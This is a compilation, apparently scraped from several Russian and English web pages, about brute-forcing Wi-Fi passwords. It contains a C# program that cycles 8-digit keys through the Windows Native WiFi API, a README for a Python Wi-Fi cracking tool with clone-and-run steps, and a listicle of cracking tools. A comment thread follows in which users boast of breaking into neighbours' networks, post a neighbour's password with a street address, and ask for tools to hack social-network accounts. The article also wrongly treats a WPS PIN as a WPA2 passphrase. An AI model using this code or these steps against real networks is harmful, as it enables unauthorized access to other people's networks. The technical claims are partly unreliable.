Время на прочтение
7 мин
Количество просмотров 57K
Надежные и постоянно меняющиеся пароли — это здорово. Особенно когда они меняются и на Wi-Fi роутере и WPS на нем вообще отключен. В этом посте: сколько занимает перебор WPS pin и есть ли у этого практическое применение? А еще напишем программу для брутфорса на C#
Дисклеймер: информация представленная в публикации носит сугубо исследовательский характер для рассмотрения модели угрозы «брутфорс» (подбор пароля) с целью оценки защищенности тестового стенда и не является инструкцией к противоправным действиям. Исследование проводилось на тестовом стенде, состоящим из личного оборудования, не подключенного к сети интернет. Ответственность за противоправное использование полученной информации ложится на субъекта воспроизвевшего атаку не в исследовательских целях и против оборудования других субъектов.
Итак
Самый скучный но обязательный блок статьи позади, однако стоит вспомнить и про следующие статьи УК РФ:
-
ст. 272 УК РФ. Неправомерный доступ к компьютерной информации
-
ст. 273 УК РФ. Создание, использование и распространение вредоносных компьютерных программ
-
ст. 138 УК РФ. Нарушение тайны переписки, телефонных переговоров, почтовых, телеграфных или иных сообщений
-
ст. 159.6 УК РФ. Мошенничество в сфере компьютерной информации
Взламывать чужие Wi-Fi роутеры — это очень плохая идея.
Тем не менее, в качестве «proof of concept» попробуем воспроизвести брутфорс атаку на домашний роутер с использованием C#. Атака будет основана на использовании Native WiFi API и xml профилях.
Профили для Wi-Fi, на мой взгляд, заслуживает отдельной статьи и для меня стало большим удивлением, что существует получение профиля, например, прямо с сайта — об этом есть небольшая статья в документации Майкрософт. В кратце это работает так: xml с реквизитами для подключения подтягивается в системные настройки (а если точно, то в UWP приложение Настройки) и во всплывающем окне показывается какую сеть предлагается добавить. Как сказано в самой статье, это может быть использовано для добавления сети заранее, еще до посещения кафе/лаунджа/{you_name_it} где вещает сеть. Подробно элементы xml профиля описаны тут.
Атака будет производиться посредством генерации xml профиля в коде и его передачи в Native WiFi API — далее Windows выполнит попытку подключиться и, если удалось подобрать WPS pin, удачно использованный профиль останется в компьютере, а pin будет выведен на консоль.
Посмотреть уже существующие профили можно двумя способами: вручную и через консоль. Для ручного просмотра нужно зайти в C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces и выбрать адаптер по его Id — узнать этот Id можно при небольшом дебаге подключаемой библиотеки или перебрав вручную. Для просмотра через консоль потребуются права администратора и пара команд — этот способ более удобен для точечного вытаскивания профиля к нужной сети:
netsh wlan show profile
netsh wlan export profile name="{Insert profile name}" folder=C:\WlanProfiles
Чтобы не ошибиться со значениями и полями в xml профиле, можно сперва попытаться подключиться к атакуемой Wi-Fi сети с заведомо неправильным паролем — так Windows создаст xml файл за вас и далее останется лишь динамически подставлять пароли.
В примере xml профиль будет храниться в виде строки в коде и это не самый лучший подход к формированию xml, но его вполне хватит чтобы поиграться с попытками подключится к сети. На самом деле на сайте документации Майкрософт есть xsd схема по которой создаются xml профили, но почему-то в ней отсутствует секция «sharedKey», поэтому я решил хранить xml профиль просто строкой в коде как это описано на Stackoverflow. В целом для более «промышленного» решения можно сгенерировать классы через xsd.exe, но в конкретно этом случае придется сверяться с xml профилем атакуемой сети для поиска всех недостающих полей, так как вполне возможно что опубликованная xsd схема просто устарела.
С подобной атакой должен справиться любой Wi-Fi адаптер, но подбор пароля без стратегии и без параллелизации на несколько адаптеров займет много времени. Так перебор WPS pin одним адаптером и попыткой раз в 2 секунды может занять до 6.3 года или же до 2315 дней. Уместно будет вспомнить цитату, что «9 женщин не родят ребенка за месяц», ведь использование 9 адаптеров сократит подбор пароля до 257 дней — почти 9 месяцев
Шаг 1 — Подготовка решения
Для начала склониуйте проект ManagedWiFi — это обертка для доступа к сборке wlanapi.dll, которая даст доступ к Native WiFi API — последняя дает возможность просматривать состояние Wi-Fi адаптеров, сетей, и добавлять профили для подключения, что и будет использовано для воспроизведения атаки.
Здесь я отмечу, что в NuGet есть пакет ManagedWiFi, но во время подключения к Wi-Fi выпадало исключение — у меня это решилось ссылкой на скаченный проект, но может быть пакет заработает у вас с первого раза.
Далее создайте проект с консольным приложением и сделайте ссылку на проект ManagedWifi из скачанного репозитория либо добавьте одноименный пакет NuGet. Этот этап можно считать успешным, если получилось создать объект WlanClient, увидеть список адаптеров и вывести список доступных сетей:
WlanClient client = new ();
foreach (WlanClient.WlanInterface wlan in client.Interfaces)
{
wlan.Scan();
Wlan.WlanAvailableNetwork[] networks = wlan.GetAvailableNetworkList(0);
foreach (Wlan.WlanAvailableNetwork network in networks)
{
string ssid = Encoding.Default.GetString(network.dot11Ssid.SSID);
Console.WriteLine(ssid);
}
}
Шаг 2 — профиль для Wi-Fi
Профиль будет собираться из трех составляющих: название профиля, hex значение названия SSID и WPS pin c которым будет выполняться попытка подключения, а все остальные поля возьмем из xml профиля с которым ранее пытались подключиться к аналогичной сети. Для теста попробуем подключиться к сети с защитой WPA2PSK/AES, которую нашли выше:
string key = "00000001"; // А еще сюда можно вписать заранее (не)известный пароль
string profileName = Encoding.Default.GetString(network.dot11Ssid.SSID);
byte[] hexBytes = Encoding.Default.GetBytes(profileName);
string hex = BitConverter.ToString(hexBytes).Replace("-", "");
string profileXml = string.Format(
"<?xml version=\"1.0\"?><WLANProfile xmlns=\"http://www.microsoft.com/networking/WLAN/profile/v1\"><name>{0}</name><SSIDConfig><SSID><hex>{1}</hex><name>{0}</name></SSID></SSIDConfig><connectionType>ESS</connectionType><connectionMode>manual</connectionMode><autoSwitch>false</autoSwitch><MSM><security><authEncryption><authentication>WPA2PSK</authentication><encryption>AES</encryption><useOneX>false</useOneX></authEncryption><sharedKey><keyType>passPhrase</keyType><protected>false</protected><keyMaterial>{2}</keyMaterial></sharedKey><keyIndex>0</keyIndex></security></MSM></WLANProfile>",
profileName, hex, key);
Как было сказано в самом начале, на каждую попытку будет создаваться такой xml профиль, а уже существующий профиль для атакуемой сети будет перезаписываться. Далее при вызове метода Connect, будет передаваться имя профиля по которому нужно выполнить соединение:
try
{
wlan.SetProfile(Wlan.WlanProfileFlags.AllUser, profileXml, true);
wlan.Connect(Wlan.WlanConnectionMode.Profile, Wlan.Dot11BssType.Any, profileName);
await Task.Delay(2 * 1000);
}
catch (Exception e)
{
Console.WriteLine(e);
}
Шаг 3
Соберем все что получилось в одном месте и попробуем запустить:
using System.Text;
using NativeWifi;
// Берем первый попавшийся Wi-Fi адаптер
WlanClient client = new ();
WlanClient.WlanInterface wlan = client.Interfaces[0];
wlan.Scan();
Wlan.WlanAvailableNetwork[] networks = wlan.GetAvailableNetworkList(0);
if (networks.Length == 0)
{
OutputExtensions.PrintRow("No networks found");
return;
}
// Отбираем сеть по её названию
Wlan.WlanAvailableNetwork network = networks
.FirstOrDefault(n => Encoding.Default.GetString(n.dot11Ssid.SSID) == "desired_network_name");
// Подготавливаем данные для создания профиля
string profileName = Encoding.Default.GetString(network.dot11Ssid.SSID);
byte[] hexBytes = Encoding.Default.GetBytes(profileName);
string hex = BitConverter.ToString(hexBytes).Replace("-", "");
// Перебираем значения WPS pin - максимум 8 цифр.
// Также же тут можно сделать перебор по словарю утекших паролей
for (int i = 0; i < 99999999; i++)
{
string wpsPin = $"{i}";
wpsPin = new string('0', 8 - wpsPin.Length) + wpsPin;
Console.WriteLine($"Trying pin {wpsPin}");
string profileXml = string.Format(
"<?xml version=\"1.0\"?><WLANProfile xmlns=\"http://www.microsoft.com/networking/WLAN/profile/v1\"><name>{0}</name><SSIDConfig><SSID><hex>{1}</hex><name>{0}</name></SSID></SSIDConfig><connectionType>ESS</connectionType><connectionMode>manual</connectionMode><autoSwitch>false</autoSwitch><MSM><security><authEncryption><authentication>WPA2PSK</authentication><encryption>AES</encryption><useOneX>false</useOneX></authEncryption><sharedKey><keyType>passPhrase</keyType><protected>false</protected><keyMaterial>{2}</keyMaterial></sharedKey><keyIndex>0</keyIndex></security></MSM></WLANProfile>",
profileName, hex, wpsPin);
try
{
wlan.SetProfile(Wlan.WlanProfileFlags.AllUser, profileXml, true);
wlan.Connect(Wlan.WlanConnectionMode.Profile, Wlan.Dot11BssType.Any, profileName);
// Тут задается время ожидания для попытки
// В моей конфигурации это 2 секунды, но
// время придется подбирать вручную
await Task.Delay(2 * 1000);
}
catch (Exception e)
{
Console.WriteLine(e);
}
if (wlan.CurrentConnection.isState == Wlan.WlanInterfaceState.Connected)
{
Console.WriteLine($"WPS pin is {wpsPin}");
break;
}
Console.WriteLine($"WPS pin {wpsPin} did not work");
}
Вместо заключения
Как оказалось, написать программу для подбора WPS pin на C# можно, а кроме просто перебора цифр при небольших доработках можно даже перебрать пароли из файла.
Практического смысла в этой программе крайне мало, но как минимум что-то можно переиспользовать для обновления Wi-Fi профилей в корпоративных ноутбуках либо провести другой вид атаки и, например, заставить нужное устройство подключиться к «правильной» сети.
В свободном доступе давно существует aircrack-ng и при минимальных знаниях можно в разумное время подобрать пароль к сети просто следуя гайду. И помните: взламывать чужие Wi-Fi роутеры — это очень плохая идея.
Wifi Bruteforce (version 2.0)
- Wifi Bruteforce (version 2.0)
- Introduction
- What’s New
- Python Installation
- Windows
- macOS
- Linux
- Ubuntu and Debian
- Fedora
- CentOS
- Installation
- 1.0
- Install
- How to use?
- Wifi bruteforce menu (Password generator)
- 2.0
- Windows
- 1.0
- Contact
Introduction
This is a program for Wifi password brute-forcing that allows you to test the security of your network and assess the strength of your passwords. Version 2.0 comes with significant improvements compared to the previous version, including bug fixes, a complete program redesign, and the addition of a user interface.
What’s New
Version | Improvements |
---|---|
1.0 | Slightly accelerated the cracking process |
2.0 | Fixed numerous bugs, completely redesigned the program, added a user interface (in console), significantly accelerated the cracking process using threads, making a program for many OS (including Windows, MacOS, Linux, etc.) |
Python Installation
The Wifi Bruteforce program is written in Python, so you will need to install Python if you don’t have it already. Here’s a step-by-step guide to installing Python on different operating systems:
Windows
- Go to the official Python website: https://www.python.org/downloads/windows/.
- Download the Python installer that matches your operating system version (32-bit or 64-bit).
- Run the downloaded installer.
- Make sure to check the «Add Python to PATH» option.
- Click the «Install Now» button and follow the on-screen instructions.
- Once the installation is complete, Python will be successfully installed on your computer.
macOS
- Go to the official Python website: https://www.python.org/downloads/mac-osx/.
- Download the Python installer for macOS.
- Run the downloaded installer.
- During the installation, make sure to check the «Install launcher for all users» and «Add Python to PATH» options.
- Click the «Install Now» button and follow the on-screen instructions.
- Once the installation is complete, Python will be successfully installed on your computer.
Linux
Python is usually pre-installed on most Linux distributions. If you don’t have it, you can install it through your package manager. Here are some examples of commands to install Python on popular distributions:
Ubuntu and Debian
sudo apt update
sudo apt install python3
Fedora
CentOS
Installation
- Download the Wifi Bruteforce program from the Releases section of this repository. (recommended last, 2.0), if you using windows, you can download the 1.0 version but 1.0 works only on Windows
- Extract the zip file with program and use the menu in top to navigate the guide
1.0
Requirements:
Python 3 install from this site
Module pywifi (using pip install pywifi in terminal)
Module tkinter (using pip install tkinter in terminal)
Install
- Launch the setup.exe file and choose the language
- After selecting the language and continuing, the following window should appear:
If such a window appears as in the photo above, then you must confirm the terms of the license and continue - After clicking the «continue» button, you must specify the path where to save
- Select start menu folder (or you can use deafult name)
- You must check the «create a desktop shortcut» box, because if you do not check it, you will have to look for the program in the folder where you installed it, if you have checked it, then a shortcut to the program will appear on your desktop. Do as in the photo
- Check if everything you specified is correct
- Final step: Click «install» and wait until the program is installed
How to use?
After installation, a shortcut will appear on the desktop such as in the photo below:
- Launch the program by double-clicking on the program’s shortcut
After starting the program, the following window will appear:
Wifi bruteforce menu (Password generator)
Click button «Password generator» and wait for the generator to start, if the program has started, the following window should appear:
Input how many passwords generate and click Enter
Then password lenght and click Enter
Wait for end of henerating and click Enter
Paswwords that you generate stored in file «passwords.txt»
Wifi bruteforce menu
If you want to hack the WIFI you can use the «Wifi bruteforce»
Before we can start read this license:
!!!WARNING!!!
PLEASE READ THIS!!!
A brute-force attack is a trial-and-error method used by
application
programs to decode login information and encryption keys to use them to gain
unauthorized access to systems.
Using brute force is an exhaustive effort rather than employing intellectual strategies.
Just as a criminal might break into and crack a safe by trying many
possible combinations, a brute-force attack of applications tries all
possible combinations of legal characters in a sequence.
Cybercriminals typically use a brute-force attack to obtain
access to a website, account or network.
They may then install malware, shut down web applications or conduct data breaches.
PLEASE USE THIS PROGRAM ONLY FOR GOOD!
After reading launch the Wifi brutforce menu and start the wifi bruteforce program
If you don’t install requirements the window will closed
Or if you install all, this window should appear:
On this photo you can see targets with numbers, strenght and SSID of wifi
You must choose the target (input only № of Wifi)
Confirm, and click Enter
Then we must input the filename of our textfile with passwords
To use deafult lib that was downloaded with program input «Cracklib.txt» (with format!)
Click Enter and wait
If password is true the program closed and connect you to the Wifi
How to crack Wifi using the generated passwords?
Generated passwords stored in file «passwords.txt»
Input «passwords.txt» instead of «Cracklib.txt»
2.0
Windows
Open cmd and check that you install the git
If you get an error install git with this link
After installing git write in cmd
git clone https://github.com/DenTs123/Wifi-bruteforce/
cd Wifi-bruteforce/Versions/2.0/Windows
python main.py
After this you can see the Wifi bruteforce menu
Watch the tutorial how to brute the wifi
To use generator type «2» in menu and input values that program are want
Watch authors: type 3 in menu
Contact
The author of the Wifi Bruteforce program is @Opasniy_chel. If you have any questions or suggestions for improving the program, feel free to contact the author.
Important: Wifi password cracking is illegal and violates privacy and property rights. Please use this program only for testing your own network security or with the permission of the network owner.
Взлом пароля WiFi может быть полезным навыком, особенно если вы забыли свой пароль или хотите проверить безопасность своей собственной сети. В Windows есть несколько программ, которые могут помочь вам взломать пароль WiFi с помощью метода брута.
Программы для брута используют метод перебора комбинаций паролей, проверяя каждую возможную комбинацию, пока не будет найден правильный пароль. Однако, стоит отметить, что попытки взлома паролей без разрешения владельца сети являются незаконными, и могут привести к юридическим последствиям.
Перед тем как использовать программы для брута паролей WiFi, убедитесь, что это разрешено законодательством вашей страны, и получите соответствующие разрешения и согласие от владельца сети.
Если вы все еще решите использовать программы для взлома паролей WiFi, нужно знать, что не все программы одинаково эффективны и просты в использовании. В этой статье мы рассмотрим несколько самых популярных программ, которые можно использовать для брута паролей WiFi в Windows.
Содержание
- Как подобрать пароль Wifi в Windows
- Программы для брута паролей Wifi в Windows
- Подготовка к взлому пароля Wifi в Windows
- Перебор паролей Wifi в Windows с помощью программ
- Установка и настройка программ для взлома паролей Wifi в Windows
- Aircrack-ng
- Cain & Abel
- Wireshark
- Основные принципы и советы по взлому паролей Wifi в Windows
Как подобрать пароль Wifi в Windows
Подбор пароля Wifi в Windows может быть полезным, если вы забыли свой собственный пароль или хотите получить доступ к защищенной сети без авторизации. Однако следует отметить, что выполнение подобных действий без разрешения владельца сети незаконно и может повлечь за собой юридические последствия.
Для подбора пароля Wifi в Windows можно использовать специальные программы для брута, которые осуществляют перебор паролей до нахождения подходящего варианта. Одним из наиболее популярных инструментов является Aircrack-ng. Он помогает взломать пароль Wifi путем анализа зашифрованных пакетов данных, перехваченных сетевой картой. Другая известная программа для брута – Wireshark, которая также используется для перехвата и анализа сетевого трафика.
Для подбора пароля Wifi в Windows можно использовать также и словарные атаки. Этот метод основан на переборе паролей из предустановленных списка слов. Существуют различные программы для словарных атак, например, Hashcat, John the Ripper, crunch и многие другие. Однако следует отметить, что словарные атаки эффективны только в случае, если пароль был создан на основе простых слов или комбинаций из них.
Важным аспектом подбора пароля Wifi является использование мощного компьютера с высокой производительностью, так как этот процесс может быть очень ресурсоемким и занимать много времени. Также стоит иметь в виду, что при использовании брутфорс-метода действительно сильных защищенных паролей может потребоваться огромное количество времени на их подбор.
В любом случае, мы настоятельно рекомендуем использовать подобные методы и программы только в легальных целях, с разрешения владельца сети или в целях оценки безопасности своей собственной сети.
Программы для брута паролей Wifi в Windows
Когда речь заходит о взломе пароля Wifi в Windows, на помощь приходят специальные программы для брута. Эти инструменты обеспечивают эффективный способ проникнуть в защищенную сеть без необходимости знать пароль.
Вот несколько популярных программ для брута паролей Wifi в Windows:
- Aircrack-ng: Aircrack-ng является одной из самых известных и мощных программ для взлома паролей Wifi в Windows. Она позволяет перехватывать пакеты данных, выполнять атаки на handshake WPA/WPA2 и деаутентификацию клиентов для получения подробной информации о пароле.
- Cain & Abel: Cain & Abel — это многофункциональный инструмент для взлома паролей Wifi и не только. Он может воспользоваться перехваченной информацией о сети, а также использовать словари и методы брута для взлома паролей.
- Wireshark: Wireshark — это мощный сниффер сетевых пакетов, который может использоваться для захвата и анализа трафика Wifi. В то время как Wireshark сам по себе не предоставляет функций для взлома паролей, он может предоставить ценную информацию для последующего брута.
- THC Hydra: THC Hydra — это один из самых быстрых и эффективных инструментов для взлома паролей. Он основан на переборе методом брута и может использовать словари или генерировать пароли автоматически. Он может работать с различными протоколами, включая HTTP, FTP, Telnet и другие.
Важно помнить, что использование этих программ без разрешения владельца сети является незаконным. Взлом пароля Wifi может иметь серьезные юридические последствия, поэтому перед использованием любой программы для брута паролей Wifi в Windows необходимо убедиться в том, что вы действуете в соответствии с законодательством своей страны.
Подготовка к взлому пароля Wifi в Windows
Прежде чем начать взлом пароля Wifi, необходимо выполнить ряд подготовительных действий:
- Убедиться, что ваш компьютер соответствует требованиям программы для брута паролей. Обычно это требует наличие достаточного объема оперативной памяти и свободного места на жестком диске.
- Загрузить и установить программу для брута паролей на ваш компьютер. Рекомендуется использовать надежное и проверенное программное обеспечение.
- Получить необходимые данные для взлома пароля Wifi. Это может включать в себя имя доступной Wifi-сети (SSID), тип защиты и серийный номер маршрутизатора.
- Определить способ атаки на пароль Wifi. Существуют различные методы взлома, такие как словарная атака, атака по перебору и атака по восстановлению пароля.
- Подготовиться к длительному процессу взлома пароля. Некоторые атаки могут занимать много времени, особенно если пароль достаточно сложный.
После выполнения этих подготовительных действий вы будете готовы начать взлом пароля Wifi в Windows с использованием выбранной программы для брута паролей.
Перебор паролей Wifi в Windows с помощью программ
Для перебора паролей Wifi в Windows существует несколько программ, которые предоставляют возможность автоматизировать этот процесс:
1. Aircrack-ng
Aircrack-ng является одним из самых популярных инструментов для взлома паролей Wifi. Он основан на методе брутфорса, который заключается в переборе возможных комбинаций паролей до тех пор, пока не будет найден правильный.
2. Wireshark
Wireshark – это мощный инструмент для анализа сетевого трафика. Он позволяет перехватывать пакеты данных, включая пароли Wifi, и анализировать их с целью взлома беспроводной сети.
3. Cain & Abel
Cain & Abel предоставляет больше возможностей, чем только перебор паролей Wifi. Он также может взламывать пароли администратора, перехватывать сетевой трафик и многое другое.
4. Hydra
Hydra – это парольный брутфорсер, который может использоваться для перебора паролей Wifi. Он предлагает широкий спектр функций и поддерживает множество различных протоколов.
Важно отметить, что использование этих программ для взлома паролей Wifi без согласия владельца сети является преступлением и может быть наказуемо законом. Поэтому убедитесь, что вы действуете в рамках закона и только в пределах своей собственной беспроводной сети.
Установка и настройка программ для взлома паролей Wifi в Windows
Если вы хотите взломать пароль Wifi в операционной системе Windows, вам потребуется установить и настроить специальные программы. В этом разделе мы расскажем вам о нескольких популярных инструментах и о том, как их установить и настроить.
Aircrack-ng
Один из самых известных и мощных инструментов для взлома паролей Wifi — Aircrack-ng. Для установки Aircrack-ng в Windows вы можете следовать этим простым шагам:
- Скачайте Aircrack-ng с официального сайта разработчика;
- Запустите установочный файл;
- Следуйте инструкциям мастера установки, выберите путь для установки;
- После установки запустите командную строку и перейдите в папку, в которую вы установили Aircrack-ng;
- Вы можете начать использовать программу, вводя команды в командной строке.
Cain & Abel
Другая популярная программа для взлома паролей Wifi в Windows — Cain & Abel. Для установки Cain & Abel в Windows выполните следующие простые шаги:
- Скачайте программу Cain & Abel с официального сайта;
- Запустите установочный файл;
- Следуйте инструкциям мастера установки, выберите путь для установки;
- После установки запустите программу и выполните настройку, следуя инструкциям в интерфейсе программы.
Wireshark
Wireshark является еще одной популярной программой для анализа и взлома паролей Wifi. Установить Wireshark в Windows можно, выполнив следующие действия:
- Скачайте исполняемый файл установщика Wireshark с официального сайта;
- Запустите установочный файл;
- Следуйте инструкциям мастера установки, выберите путь для установки;
- После установки запустите программу и выполните необходимую настройку для анализа сетевого трафика Wifi.
После установки выбранной вами программы для взлома паролей Wifi в Windows, вам может понадобиться дополнительная настройка и изучение документации по использованию программы. Помните, что использование таких программ с целью взлома паролей без разрешения владельца Wifi сети является незаконным.
Основные принципы и советы по взлому паролей Wifi в Windows
Взлом паролей Wifi может быть полезным, когда вы забыли пароль к своей сети или хотите проверить уровень безопасности своей собственной сети. Однако, мы рекомендуем использовать эти методы только в законных и легальных целях.
1. Используйте специализированные программы. Существует множество программных инструментов, созданных для взлома паролей Wifi. Некоторые из них включают Aircrack-ng, Wireshark и Cain & Abel. Эти программы могут быть сложны в использовании, поэтому важно ознакомиться с их документацией и руководствами пользователя.
2. Изучите уязвимости WPA и WEP. WPA и WEP — две наиболее распространенные защиты паролей Wifi. Изучите уязвимости этих протоколов и применяйте методы взлома, основанные на этой информации. Однако, имейте в виду, что многие сети уже используют более надежные протоколы безопасности.
3. Используйте словарные атаки. Словарные атаки основаны на попытках перебрать все возможные пароли из определенного словаря. Для этого вам понадобится специализированное программное обеспечение, которое будет автоматизировать процесс подбора пароля.
4. Используйте форсированные атаки. Форсированные атаки основаны на переборе всех возможных символов и комбинаций паролей. Однако данная методика требует больше времени и ресурсов, чем использование словарей.
Важно отметить, что взлом паролей сетей Wifi является незаконной деятельностью, если не имеете разрешения владельца сети. Помимо этого, попытки взлома Wifi могут являться преступлением в соответствии с местными законами. Прежде чем использовать эти методы, убедитесь, что у вас есть разрешение на совершение таких действий.
-
КПД у программы процентов на 50. Но в принципе этого хватает. Особенно когда речь идёт о пассивном подборе.
-
-
а какой код когда я разархивирую то надо какойта пароль
-
-
скачал,есть проблемы,не находит pass.txt,что делать???как быть?пробывал свою сеть взломать не рубит
-
файл pass.txt это ваш словарь
-
-
-
-
народ скиньте на норм словари пж)
-
Ага, всё в гуды сливает, «сбрутил» 13 точек, но у каждой пароль или qwertyui или fuckyou, короче кал
-
Oncy: кал это твой мозг, всё робит)
-
работает я взломал уже много вайфаев
-
-
-
к сожалению не одну сеть не смог взломать. может архив маленький, и на последних минутах выдает ошибку. а так программка хорошо задумана
-
народ дайте ссыль на норм словари пж)
-
-
нормальная прога взломал соседскую сеть без всякой хакерской пурги и лишних движений
-
-
-
не получается архивировать файл, ошибку выдаёт
-
-
пролистал вашу работу, спасибо за проги!!!
-
скажите пожалуйста почему иногда пишу пароль ‘www.spy-soft.net’ показывает неверный пароль
-
Легче всего копировать и вставлять. Я и сам не раз ошибался неправильно набрав пароль. Пока не перешёл на последний Winrar, там есть возможность запоминать пароль и быстро его вызывать из выпадающей строки. Очень удобно если часто качаешь с сайтов где архивы запаролены.
-
-
-
где посмотреть найденный пароль? пишет GOOD…
-
Открыл Good.txt там пароль,скопировал его в графу для ввода пароля при подключении к точке,пишет несовпадение пароля… Прога не на 100% подбирает пароли? сканировал своим словарём на 1000000 слов…
-
не находит гуд только бад 1
-
-
При запуске в Вин7 (64-бит) выдает ошибку? Запуск от имени администратора не помогает. ВТФ?
-
нужен wicrack for win7 Help me !!!
-
-
архив запороленый, зачем писать что он бесплатный?
-
пароль написан под программой.. Или слепые?
-
-
Ломать пароль от rar посетитель данного сайта уж точно должен уметь
-
Такой программой лет 200 пароль будет перебирать. Закинул в словарь пароль от точки — пропустил и не подобрал…
Итог ФУФЛО!
-
Скажите плиз пароль от архива,просто нигде не нашёл
-
на 70% сетей пишет один и тот же пароль qwertyui, который никуда не подходит….
-
Прога рабочая!Изменял свою базу пасов ставил(расширял) !пароли подбирает долговато!но подобрать легкий пароль с цифровым паролем сможет!но один минус это -время!
-
Нормальная прога мой вайфай взломала. Теперь ещё бы взломать соседский wifi ))
-
-
Прога хрень полнейшая, с дефолтного словаря на 6 точек в округе, 6 гудов и не один не работает, при том, что от одной точки в словаре был 100% верный пароль , она его пропустила и написала неверный. Зато трек порадовал, автор, пили еще.
-
как закинуть в нее коды??!
-
Огромное спасибо, всё работает. Нашло пароль буквально за пару минут.
-
КУДА ОН ЗАКИДЫВАЕТ ПОРОЛИ УЖЕ ВЕСЬ КОМП ПЕРЕШАРИЛ
-
пароль не подходит, не могу разархивировать все делал по инструкций ?
-
-
Спасибо ребята! Вы супер!
-
АУ ПОДСКАЖИТЕ КУДА ЗАКИДЫВАЕТ ПАРЛИ
-
пароль нашло от мое же сети, минимальная скорость подбора 0.5 сек-1 пароль.
-
Спасибо за коменты)) поржал
-
Прога пока лажовая. Просканил 8 сетей, показала GOOD в 6 из их. Ну понятно, что ни один пароль не верный. Потом выбрал сеть, пароль от которой заранее знал и положил в словарь — прога нашла написала что GOOD, при этом показывая совершенно другой пароль, который однозначно не подходит.
Пока юзать эту прогу бессмысленно, возможно автор ее доработает и получится что-то полезное -
Выловил один гуд соседского вайфая. Спасибо!
-
Можно ли запустить его на планшете андроид 4.0.4 ?
-
-
пачему у меня при открытии приложения установки у меня просят пароль
-
с вайфай разобрался а как взломать блютуз? есть такая же лёгкая программа?
-
Не могу разархивировать, запрашивает пароль.
Почему автор не может его дать, хотя знает об этом.Сколько мусора в интернете…..ужас.
Всем кто не хочет тратить свои нервы и время, советую ###### на официальном сайте.
Всё работает и программа более функциональна.
Советую. -
О простите за предыдущее гневное письмо.
Не заметил пароля на архив, прошу прощения.
Читал не внимательно.
Будим пробовать. -
какой пароль вводить скажите пожалуйста
-
Ни на одной из доступных ТД не установлен пароль из словаря, получается подбор пароля в 80% просто пустая трата времени, а словрь из 1000паролей он будет сутками подбирать
-
Скажите, пожалуйста, куда прикрутить словари с паролями?
-
как добавить новый словарь с паролями?
-
Туда, где находится файл WifiCrack.exe, то есть, в папку, в которую распакован архив.
-
-
-
как открыть рар файл ? пороль хочет
-
получилось пороль .. password -www.spy-soft.net
-
Всё робит взломал возле себя 3 сети
-
А где можна скачать словарь только на цифры???
-
А у меня при распаковке архива выдаёт ошибку и распаковываются не все файлы
-
ошибку не пишет,звук пибим)))) но файла Запустить bootinst.bat почему то нет. у тя получилось че нить!?
-
-
побольше словарей с номерами, а то многие свои номера телефонов ставят(
-
У меня нашел одну ! Написано GOOD — 1 ! Но в папке GOOD нет ни чего (( что делать где пароль который нашел прога ????
-
у меня почему то нет папки Запустить bootinst.bat
-
что делать ? я уже задолбался искать способ по проще, хакнуть хороший сигнал. ничего не выходит я в отчаянье ( хэлп дауну плз) можете поржать,только помогите!
-
-
всем привет друзья ,,,,,подскажите как работать этой программой ,вот уже неделя чейто вайвай ловит ,,на пароле стоит ,, скачал прогу полько не смог разобраться ,,помогите пожалуйста
-
-
хорошая прога, есть прога взлом одноклассников? (без региза и смс) дайте ссылку плиз,
-
-
где пароль не могу в архиве найти
-
не могу скачать программу
-
скачал фаил но он почему та как видио что делать
-
почему программа не может найти словарь и что мне надо делать
-
REBYATA VSE RABOTAET, LICHNO PROVERYAL (VZLOMAL SVOI WI FI), U KOGO NE RABOTAET, DOBAV’TE SLOVAR’ PAROLEI DLYA VZLOMA, VSEM UDACHI!!!
-
Есть сильный сигнал, забрутил его, выдал правильный пароль qwerty1 (7 цифр), сами понимаете такого быть не может, что делать?
-
люди помогите пожалуйста где можно скачать рабочую програмку для взлома одноклассников ооочень нужно прошу!
-
Не открывается. Пишет «не удалось открыть программу»
-
у меня архив скачался ))открыл а там всё запаролено что делать и каким архивом открыть))этим не распаковывается)
-
Я проверил. Архив не битый, стандартный пароль для нашего сайта!
-
-
Windows 8.0/8.1 don’t working!
-
Подскажите пожалуйста, wicrack работает и сканирует но не выдаёт пароль. Что делать?
-
-
чем пороль открить?в место слова получяю вопросительные знаки???
-
privet.cto za kod win rar
-
‘www.spy-soft.net’ вед ето и есть пароль на архив..
-
почему у меня не подходит параль
-
спасибо огромное я вас люблю админы но вот как потом пароль найти
-
Работает!! Спасибо за прогу
-
Почему у меня пароль открывается только в Good, а в других пишет «Неправильный пароль»?
-
я тут спецом зарегился бля чтоб задать один вопрос -КУДА ПАРОЛИ СОХРАНЯЕТ??????????????????????????????????????????????????????7
-
ребята, срочно нужен ответ???
очень срочно!
пожалуйста) -
Добрый день)
Подскажите пожалуйста кто-нибудь…или пользователи или модератора или админы куда сохраняются пароли???
спасибо.
-
-
Ленко, спасибо)
а если там нет ничего — значит не нашло? потому что пишет, что есть в GOOD,а захожу в папку — а там пусто..
-
Перепись кулхацкеров! Люди!! Зачем вам ломать wifi, если вы даже не можете пароль от архива с программой найти, да куда программа логи сохраняет! Забейте! возьме планшетик, поиграйте в танчики, пукните в вечность во вконтактике, запостите фоточку еды в инстаграмме в конце-то концов.
-
шибко умный, я смотрю?
если нечего делать, иди поработай или книгу прочитай — полезнее будет!
-
-
подскажите где взять словари и куда их закинуть?
может кто знает какие чаще всего слова употребляются в паролях и какие словари толковее будет использовать, чтоб не тратить зря время? -
-
Хорошо работает очень классный сижу и лазию через Wi-Fi
Подобрал пароль одно соседа varia
Если кто живёт в Волгограде на улице 64-армии то вот пароль 77777777 -
спасибо программе, из 5 точек доступа нашла 4 пароля, но подошел только один. а мне и этого достаточно!!!
единственное, не могу найти словари… в штатном словаре всего 271 вариант. -
у меня на win 7 64 не устанавливается!!!
-
Народ! Кто-то знает пароль на 4 хлебзаводе?
-
При открытии проги пишет ошибку «Необрабатываемое исключение в приложении» не ищет сеть, что делать кто знает?
-
подскажите пжлст,написано GOOD-1,но там пусто. как быть,че делать???
-
-
Пароль: ‘www.spy-soft.net’
-
-
wifi crack этот программа работайет windows 8.01
-
неработает,на своей сети проверял
-
а где пороли к программе брать
-
запустил программу, но она очень медленно работает, кто знает как можно её перезапустить , чтобы она подбирала пароли с места остановки, а то так чтобы проверить все 1394000 вариантов надо целый месяц комп не выключать
-
Словарь сделай поменьше, оставь только самое необходимое.
-
-
Почему программа не работает ?
-
ЗАПУСКАЙТЕ ПРОГУ ИЗ ПАПКИ WifiCrack
-
-
-
ПРограмма у меня просто не запускается по Windows 7
-
